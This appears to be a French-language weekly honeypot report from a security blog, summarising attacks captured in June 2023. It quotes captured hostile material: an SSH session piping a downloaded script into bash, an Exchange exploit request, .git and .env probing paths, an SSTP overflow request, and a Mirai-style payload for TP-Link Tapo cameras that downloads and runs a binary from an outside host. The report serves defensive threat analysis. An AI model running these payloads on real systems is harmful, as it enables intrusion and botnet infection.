[Honeypot] - Notre résumé de la semaine du 12/06/2023 au 19/06/2023

[Honeypot] - Notre résumé de la semaine du 12/06/2023 au 19/06/2023
@ Jeremie Amsellem - 01 Jul, 2023

Au cours du mois de Mai, nous avons déployé notre honeypot maison sur plusieurs adresses IPs chez divers hébergeurs sur 5 continents différents.

Des protocoles sont en cours d’ajout, et certaines évolutions sont en cours de préparation, dans cet article nous décrirons les principales attaques subies par notre infrastructure au cours de la semaine du 12/06/2023 au 19/06/2023.


Intrusion SSH

Nous avons remarqué une connexion sur le service SSH simulé de notre infrastructure à la suite d’une attaque par dictionnaire provenant de l’adresse 52.226.27[.]30.

Voici les commandes executées à la suite de cette connexion :

wget -qO- bench.sh | bash # Outil de benchmark
ls
cd /
ls
df # Listing des partitions du système de fichiers
df
du # Affichage de l'espace disque restant
apt # Tentative de reconnaissance de gestionnaire de paquets
yum
cd
ls
exit

Requêtes sur les services

Cette semaine, le service ayant été le plus attaqué est Telnet avec 61,5% des requêtes reçues étant des tentatives d’intrusion sur ce service :

  • Telnet (61,5%)
  • SSH (26%)
  • ADB (8%)

Note : Les adresses IP faisant du bruteforce et tentant d’exploiter les services sont désormais régulièrement rapportées à AbuseIPDB.

Tentative d’exploitation Microsoft Exchange

Les serveurs HTTP de notre honeypot ont été ciblés par des tentatives d’exploitation d’une ancienne vulnérabilité 0day (découverte en avril 2021) sur Microsoft Exchange.

# Détails de la requête HTTP
GET /owa/auth/x.js HTTP/1.1
Host: 95.164.37.65
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; Accept-Encoding: gzip

Recherche de contenu git, svn et de CI

Les services HTTP et HTTPS ont reçu de nombreuses requêtes provenant de clients cherchant à identifier des répertoires .git, .svn ou des fichiers liés à des systèmes d’intégration continue sur les serveurs.

Notamment utilisant les chemins suivants :

  • GET /admin/.svn/wc.db
  • GET /web/svn/wc.db
  • GET /data/svn/wc.db
  • GET /.git/config
  • GET /.git/index
  • GET /.env
  • GET /app/.env

Tentative d’intrusion SSTP

9 requêtes ciblant le service Microsoft SSTP (qui encapsule le protocole PPP via HTTPS dans le but de permettre une connexion VPN) ont été observées sur notre infrastructure, toutes de la forme :

SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75} HTTP/1.1
SSTPCORRELATIONID: {19730D60-90A0-4623-8C44-688D762AAA16}Content-Length: 18446744073709551615
Host: [ADRESSE_IP_HONEYPOT]

Provenant des adresses IP :

  • 138.68.249[.]116
  • 157.245.176[.]143

Recherche de proxy ouverts

Deux services recherchant des serveurs proxy ouverts ont été remarqués dans les logs de nos serveurs HTTP, le premier est un service Russe : best-proxies.ru, dont la page de FAQ est partagée dans l’User-Agent de la requête.

Leur méthodologie consiste essayer d’effectuer une requête HTTP vers eth0.me, qui retourne l’adresse IP d’origine de la requête, en passant en paramètre une variable aléatoire (probablement non utilisée par eth0.me mais présente pour l’identification par best-proxies.ru).

Les requêtes reçues suivent ce format :

GET http://eth0.me?Z77234633542Q1 HTTP/1.1
Host: eth0.me
Cookie: Z77234633542Q1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https://best-proxies.ru/faq/#from)Referer: https://google.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Connection: close

post=true

D’autres requêtes, semblant toutes provenir du même client (Go-http-client/1.1) ont été observées, en provenance des adresses IP :

  • 45.137.206[.]172
  • 185.224.128[.]17
  • 139.177.202[.]34

Celles-ci tentent d’établir une connexion HTTPS vers google.com à travers d’un potentiel proxy.

Reconnaissance OT

Plusieurs adresses IP ont scanné nos services HTTP (port 80) dans le but de découvrir des interfaces Redlion, Redlion est un éditeur logiciel d’interfaces IHM utilisées dans le domaine de l’informatique industrielle (OT).

Les requêtes en détail :

GET /portal/redlion HTTP/1.1
Host: 146.59.94.103
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Accept-Encoding: gzip

Les adresses IP concernées :

  • 192.241.236[.]62
  • 162.243.151[.]11
  • 192.241.193[.]43
  • 159.203.208[.]19
  • 192.241.234[.]7
  • 159.203.192[.]9
  • 107.170.228[.]17
  • 107.170.234[.]9

Pas de tentatives d’exploitation au delà de la reconnaissance de cette interface ont été notées.

Authentification NTLM via HTTPS

Pour la première fois cette semaine, nous avons reçu des tentatives d’authentification via NTLM sur notre serveur HTTPS, toutes utilisant l’identifiant “Admin@DESKTOP-C7Q59JO”

base64 data and decoded value containing NTLM credz

Cet identifiant ne semble pas être connu d’autres honeypots pour le moment, nous avont listé 4 adresses IP Européenes impliquées dans ces tentatives :

Une nouvelle tentative d’exploitation d’appareil IoT (probablement également en provenance du botnet MIRAI) a été observée sur notre honeypot : l’exploitation de la CVE-2021-4045 permettant l’execution de commandes sur les caméras Tapo de TP Link.

La charge utile suivante a été reçue de la part de 179.43.163[.]132 :

cd /tmp;
rm -rf sh;
wget http://85.217.144[.]207/sh;
chmod 777 sh;
./sh tplink.tapo;

Si aujourd’hui l’adresse IP 85.217.144[.]207 ne partage plus le fichier sh, l’adresse est bien connue de URLHaus et VirusTotal et a été classifiée dans les catégories : “Malware Download”, “DDoS-Bot”, “elf”, “mirai”.


Mises à jour de l’infrastructure honeypot

  • Création d’un script de reporting IPAbuseDB (Fait)
  • Ajout du protocole SMB (En cours)
  • Ajout de machines ‘Windows’ sur le honeypot (En cours)

C’est tout pour cette semaine ! À bientôt pour les prochaines analyses du trafic de notre honeypot.

comments powered by Disqus